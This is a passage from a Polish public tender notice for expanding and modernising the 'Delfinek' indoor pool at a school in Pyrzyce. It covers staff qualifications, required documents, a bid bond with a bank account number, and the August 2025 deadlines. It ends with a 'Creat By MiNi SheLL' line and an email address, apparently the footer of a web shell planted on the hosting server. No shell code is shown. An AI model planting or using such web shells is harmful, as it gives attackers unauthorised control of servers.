ograniczeń. Zamawiający wymaga aby ta osoba posiadała minimum 5 lat doświadczenia w kierowaniu robotami budowlanymi w ww. specjalności.<br/><br/> - jedna osoba, jako kierownik robót, posiadająca uprawnienia do kierowania robotami w specjalności sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń. Zamawiający wymaga aby ta osoba posiadała minimum 5 lat doświadczenia zawodowego w kierowaniu robotami budowlanymi w ww. specjalności.<br/><br/> - jedna osoba, jako kierownik robót, posiadająca uprawnienia do kierowania robotami w specjalności sieci, instalacji i urządzeń cieplnych, wentylacyjnych, wodociągowych i kanalizacyjnych bez ograniczeń. Zamawiający wymaga aby ta osoba posiadała minimum 5 lat doświadczenia zawodowego w kierowaniu robotami budowlanymi w ww. specjalności.<br/><br/> - jedna osoba, jako kierownik budowy, posiadająca uprawnienia do kierowania robotami budowlanymi w specjalności drogowej bez ograniczeń. Zamawiający wymaga aby ta osoba posiadała minimum 5 lat doświadczenia zawodowego w kierowaniu robotami budowlanymi w ww. specjalności.<br/><br/>- jedna osoba do kierowania robotami w zakresie instalacji i urządzeń elektronicznych, komputerowych systemów sterowania i sieci komputerowych / teleinformatycznych, która posiada minimum 5 lat doświadczenia w zakresie realizacji i eksploatacji instalacji i urządzeń elektronicznych, komputerowych systemów sterowania oraz sieci komputerowych / teleinformatycznych.<br/><br/>- jedna osoba posiadająca uprawnienia budowlane w specjalności architektonicznej bez ograniczeń, uprawniające do projektowania, która w okresie ostatnich 5 lat wykonała co najmniej 1 usługę polegającą na wykonaniu dokumentacji projektowej branży architektonicznej na podstawie, której uzyskano pozwolenie na budowę obiektu o powierzchni lustra wody pod dachem o gabarytach co najmniej takich jak niecka typu „Delfinek”,<br/>- jedna osoba posiadająca uprawnienia budowlane w specjalności konstrukcyjnej bez ograniczeń, uprawniające do projektowania, która w okresie ostatnich 5 lat, wykonała co najmniej 1 usługę polegającą na wykonaniu dokumentacji projektowej w zakresie konstrukcji na podstawie, której uzyskano pozwolenie na budowę obiektu o powierzchni lustra wody pod dachem o gabarytach co najmniej takich jak niecka typu „Delfinek”,<br/>- jedna osoba posiadająca uprawnienia budowlane w specjalności sanitarnej bez ograniczeń, uprawniające do projektowania, która w okresie ostatnich 5 lat wykonała co najmniej 1 usługę polegającą na wykonaniu dokumentacji projektowej branży sanitarnej na podstawie, której uzyskano pozwolenie na budowę obiektu o powierzchni lustra wody pod dachem o gabarytach co najmniej takich jak niecka typu „Delfinek”,<br/>- jedna osoba posiadająca uprawnienia budowlane w specjalności sanitarnej bez ograniczeń, uprawniające do projektowania, która w okresie ostatnich 5 lat, wykonała co najmniej 1 usługę polegającą na wykonaniu dokumentacji projektowej branży sanitarnej w zakresie technologii uzdatniania wody basenowej, na podstawie której uzyskano pozwolenie na budowę obiektu o powierzchni lustra wody pod dachem o gabarytach co najmniej takich jak niecka typu „Delfinek”,<br/>- jedna osoba posiadająca uprawnienia budowlane w specjalności branży elektrycznej i niskich prądów bez ograniczeń, uprawniające do projektowania, która w okresie ostatnich 5 lat, wykonała co najmniej 1 usługę polegającą na wykonaniu dokumentacji projektowej przedmiotowej branży, na podstawie której uzyskano pozwolenie na budowę obiektu o powierzchni lustra wody pod dachem o gabarytach co najmniej takich jak niecka typu „Delfinek”<br/>Przez uprawnienia do pełnienia samodzielnych funkcji w budownictwie Zamawiający rozumie uprawnienia wydane na podstawie aktualnie obowiązującej ustawy – Prawo budowlane lub odpowiadające im ważne uprawnienia wydane na podstawie wcześniej obowiązujących przepisów albo odpowiednie kwalifikacje uzyskane za granicą a uznane w Polsce na podstawie przepisów o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej.<br/>Wykonawca złoży oświadczenie na temat wykształcenia i kwalifikacji zawodowych Wykonawcy lub kadry kierowniczej Wykonawcy (projektantów i kierowników budowy).<br/>Ocena spełniania warunku udziału w postępowaniu zostanie dokonana przez Zamawiającego w oparciu o informacje zawarte w<br/>- oświadczeniu o spełnianiu warunków udziału w postępowaniu, <br/>- wykazie osób, które będą uczestniczyć w wykonywaniu zamówienia, <br/>- oświadczeniu, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający w niniejszym<br/>postępowaniu wymaga, aby wykonawcy wykazując brak podstaw do wykluczenia złożyli wymagane oświadczenia / dokumenty do<br/>oferty. Na podstawie art. 125 ust. 1ustawy Pzp w terminie składania ofert każdy z wykonawców składa oświadczenia o braku<br/>podstaw do wykluczenia z postępowania – Załącznik numer 2 do SWZ<br/>Oświadczenia te potwierdzają brak podstaw wykluczenia z postępowania</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1) Oświadczenie o przynależności albo braku przynależności do tej samej grupy kapitałowej.2) Odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia,<br/>Dokumenty powinny być wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.<br/>3) Wykaz wykonanych robót budowlanych oraz w dowody określające czy te roboty budowlane zostały wykonane należycie, w szczególności zgodnie z przepisami prawa budowlanego i prawidłowo ukończone.<br/>4)	Wykonawca ubiegający się o udzielenie zamówienia publicznego musi wykazać, że w wykonywaniu zamówienia uczestniczyć będą osoby posiadające uprawnienia budowlane niezbędne do wykonania przedmiotu zamówienia, ze wskazaniem zakresu wykonywanych przez nie czynności oraz informacją o podstawie dysponowania tymi osobami.<br/>5) Zaświadczenie właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego albo inny dokument potwierdzający, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, <br/>) Zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego, że wykonawca nie zalega z opłacaniem podatków i opłat, w zakresie art. 109 ust. 1pkt 1 Pzp, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	W przedmiotowym postępowaniu jest wymagane wadium. Zamawiający żąda wniesienia wadium w wysokości:<br/>200 000,00 zł (słownie: dwieście tysięcy złotych) w terminie <br/>do dnia 11 sierpnia 2025 r. do godz.10:00<br/>2.	Wadium może być wniesione w jednej lub kilku formach przewidzianych art. 97 ust. 7 Ustawy, tj.:<br/>a)	pieniądzu<br/>b)	gwarancjach bankowych,<br/>c)	gwarancjach ubezpieczeniowych,<br/>d)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości ( Dz. U. z 2020 r. poz. 299 z późn. zmianami).<br/>Wadium w formie pieniężnej należy wnieść przelewem na rachunek bankowy Zamawiającego: w BNP Paribas Bank Polska S.A. nr 07 2030 0045 1110 0000 0112 5470 z adnotacją na blankiecie przelewu: <br/> Wadium: „ Rozbudowa i modernizacja krytej pływalni typu Delfinek przy Szkole Podstawowej im. J. Korczaka w Pyrzycach” <br/> Za termin wniesienia wadium przyjmuje się datę uznania rachunku Zamawiającego.- zgodnie z art. 97 ust. 5 Ustawy,.<br/>Szczegółowy opis znajduje się w SWZ - część IX. Wymagania dotyczące wadium <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość zmian postanowień Umowy w stosunku do treści Oferty, na podstawie której dokonano<br/>wyboru Wykonawcy.<br/>Szczegółowy zakres zmian umowy określono w załączniku nr 5 do SWZ - wzór umowy <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-08-11 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy zożyć za pośrednictwem formularza na Platformie na stronie postępowania znajdującej się pod adresem wskazanym na stronie internetowej https://platformazakupowa.pl/pn/um_pyrzyce/proceedings</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-08-11 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-09-09</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com